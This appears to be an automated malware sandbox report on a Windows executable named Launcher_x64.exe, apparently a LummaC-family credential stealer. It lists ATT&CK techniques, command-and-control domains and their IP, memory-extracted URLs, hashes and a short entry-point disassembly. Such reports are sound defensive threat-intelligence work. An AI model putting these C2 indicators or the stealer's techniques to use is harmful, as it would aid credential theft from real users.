                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\LTKMYBSEYZJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: Launcher_x64.exe PID: 7372, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                211
                Process Injection
                21
                Virtualization/Sandbox Evasion
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                211
                Process Injection
                LSASS Memory1
                Query Registry
                Remote Desktop Protocol41
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information
                Security Account Manager241
                Security Software Discovery
                SMB/Windows Admin SharesData from Network Shared Drive113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information
                NTDS21
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing
                LSA Secrets1
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                File and Directory Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem33
                System Information Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                Launcher_x64.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://undesirabkel.click/f?100%Avira URL Cloudmalware
                undesirabkel.click100%Avira URL Cloudmalware
                https://undesirabkel.click/apis0100%Avira URL Cloudmalware
                https://undesirabkel.click/.?100%Avira URL Cloudmalware
                https://undesirabkel.click:443/api100%Avira URL Cloudmalware
                https://undesirabkel.click/((j100%Avira URL Cloudmalware
                https://undesirabkel.click/A100%Avira URL Cloudmalware
                https://undesirabkel.click/api100%Avira URL Cloudmalware
                https://undesirabkel.click/100%Avira URL Cloudmalware
                https://undesirabkel.click/apite100%Avira URL Cloudmalware
                https://undesirabkel.click/apiH100%Avira URL Cloudmalware
                https://undesirabkel.click/apiw100%Avira URL Cloudmalware
                https://undesirabkel.click/4100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                undesirabkel.click
                188.114.97.3
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  undesirabkel.clicktrue
                  • Avira URL Cloud: malware
                  unknown
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      https://undesirabkel.click/apitrue
                      • Avira URL Cloud: malware
                      unknown
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            framekgirus.shopfalse
                              high
                              tirepublicerj.shopfalse
                                high
                                abruptyopsn.shopfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://undesirabkel.click/apis0Launcher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://duckduckgo.com/chrome_newtabLauncher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://undesirabkel.click/f?Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://duckduckgo.com/ac/?q=Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgLauncher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoLauncher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://undesirabkel.click/ALauncher_x64.exe, 00000003.00000002.2902244222.0000000002FEB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.rootca1.amazontrust.com/rootca1.crl0Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaLauncher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://undesirabkel.click/apiteLauncher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://ocsp.rootca1.amazontrust.com0:Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Launcher_x64.exe, 00000003.00000003.1694184499.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1736461523.000000000576A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1694007683.000000000576A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.ecosia.org/newtab/Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://undesirabkel.click/Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1749472584.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969150771.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1858070842.0000000002FEB000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1792574881.000000000571A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLauncher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://undesirabkel.click/.?Launcher_x64.exe, 00000003.00000003.1691732879.000000000300E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://undesirabkel.click/((jLauncher_x64.exe, 00000003.00000003.1749740558.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750224448.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750974693.000000000571A000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1750055715.000000000571A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://undesirabkel.click:443/apiLauncher_x64.exe, 00000003.00000003.1736528894.0000000005716000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835312617.0000000003005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://undesirabkel.click/apiHLauncher_x64.exe, 00000003.00000003.1826461210.000000000306C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2902431523.0000000003067000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969043890.0000000003063000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1968994529.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1826260410.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1794626205.0000000003065000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1793149775.0000000003063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://ac.ecosia.org/autocomplete?q=Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgLauncher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiLauncher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallLauncher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchLauncher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.microsofLauncher_x64.exe, 00000003.00000003.1693935481.0000000005771000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?Launcher_x64.exe, 00000003.00000003.1750070379.0000000005743000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://undesirabkel.click/apiwLauncher_x64.exe, 00000003.00000002.2902316169.000000000300E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1969092084.000000000300E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLauncher_x64.exe, 00000003.00000003.1694007683.0000000005745000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.mozilla.org/products/firefoxgro.allLauncher_x64.exe, 00000003.00000003.1750988808.000000000583C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Launcher_x64.exe, 00000003.00000003.1692684560.000000000575E000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1692896468.000000000575B000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.1693003349.000000000575B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://undesirabkel.click/4Launcher_x64.exe, 00000003.00000003.1835787407.000000000306D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94Launcher_x64.exe, 00000003.00000003.1751292487.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.114.97.3
                                                                                        undesirabkel.clickEuropean Union
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582871
                                                                                        Start date and time:2024-12-31 17:36:18 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 5m 45s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:8
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Launcher_x64.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/0@1/1
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 33.3%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 15
                                                                                        • Number of non-executed functions: 71
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target Launcher_x64.exe, PID 7364 because there are no executed function
                                                                                        • Execution Graph export aborted for target Launcher_x64.exe, PID 7372 because there are no executed function
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: Launcher_x64.exe
                                                                                        TimeTypeDescription
                                                                                        11:37:10API Interceptor8x Sleep call for process: Launcher_x64.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rgenerousrs.store/o362/
                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.beylikduzu616161.xyz/2nga/
                                                                                        Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                        ce.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/lxvbq
                                                                                        Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                        PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.ssrnoremt-rise.sbs/3jsc/
                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                        • gmtagency.online/api/check
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        undesirabkel.click6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.30.13
                                                                                        WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.30.13
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSLinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.75.163
                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        http://trezorbridge.org/Get hashmaliciousUnknownBrowse
                                                                                        • 104.16.79.73
                                                                                        http://knoxoms.comGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                        • 188.114.97.3
                                                                                        bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        PO#5_tower_Dec162024.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                        • 188.114.97.3
                                                                                        x6VtGfW26X.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):7.8238522969039845
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:Launcher_x64.exe
                                                                                        File size:825'856 bytes
                                                                                        MD5:741ee77540764d0c3eab3f6fa16f5f37
                                                                                        SHA1:89db0aca9e9db4cec292b77c9592e8f10626ed11
                                                                                        SHA256:fdfa752ff15ceefd4337704a2f52116dc44d18f7aa2ecb775ad0540dbc3990b2
                                                                                        SHA512:a1a44c2c59d74bf6c5c0d89fc45f8e9e1d4482d6882a8e6d02713dbbb9e346d7bd73289dfb9ddb682c3e91ac7b62153c66ac1799b81c54458a46f9b0f1115c3f
                                                                                        SSDEEP:12288:T3K1Pp+lMeB8fZ3/B+KI5sl+AAdd0tXQjZ3/B+KI5sl+AAdd0tXQJ:bK1PSMZRPB+A+AKdUgFPB+A+AKdUgJ
                                                                                        TLSH:43050152B5D1C073D973267254F4EBBA483EF5201B229ADF1BD80B6E8F306D15A31B29
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....sg.................H........................@.......................................@.....................................(..
                                                                                        Icon Hash:90cececece8e8eb0
                                                                                        Entrypoint:0x40a2e0
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows cui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6773E4A4 [Tue Dec 31 12:33:40 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:019ac8c6e24f80fb88de699b6749f599
                                                                                        Instruction
                                                                                        call 00007FC5B4B06D5Ah
                                                                                        jmp 00007FC5B4B06BBDh
                                                                                        mov ecx, dword ptr [004307C0h]
                                                                                        push esi
                                                                                        push edi
                                                                                        mov edi, BB40E64Eh
                                                                                        mov esi, FFFF0000h
                                                                                        cmp ecx, edi
                                                                                        je 00007FC5B4B06D56h
                                                                                        test esi, ecx
                                                                                        jne 00007FC5B4B06D78h
                                                                                        call 00007FC5B4B06D81h
                                                                                        mov ecx, eax
                                                                                        cmp ecx, edi
                                                                                        jne 00007FC5B4B06D59h
                                                                                        mov ecx, BB40E64Fh
                                                                                        jmp 00007FC5B4B06D60h
                                                                                        test esi, ecx
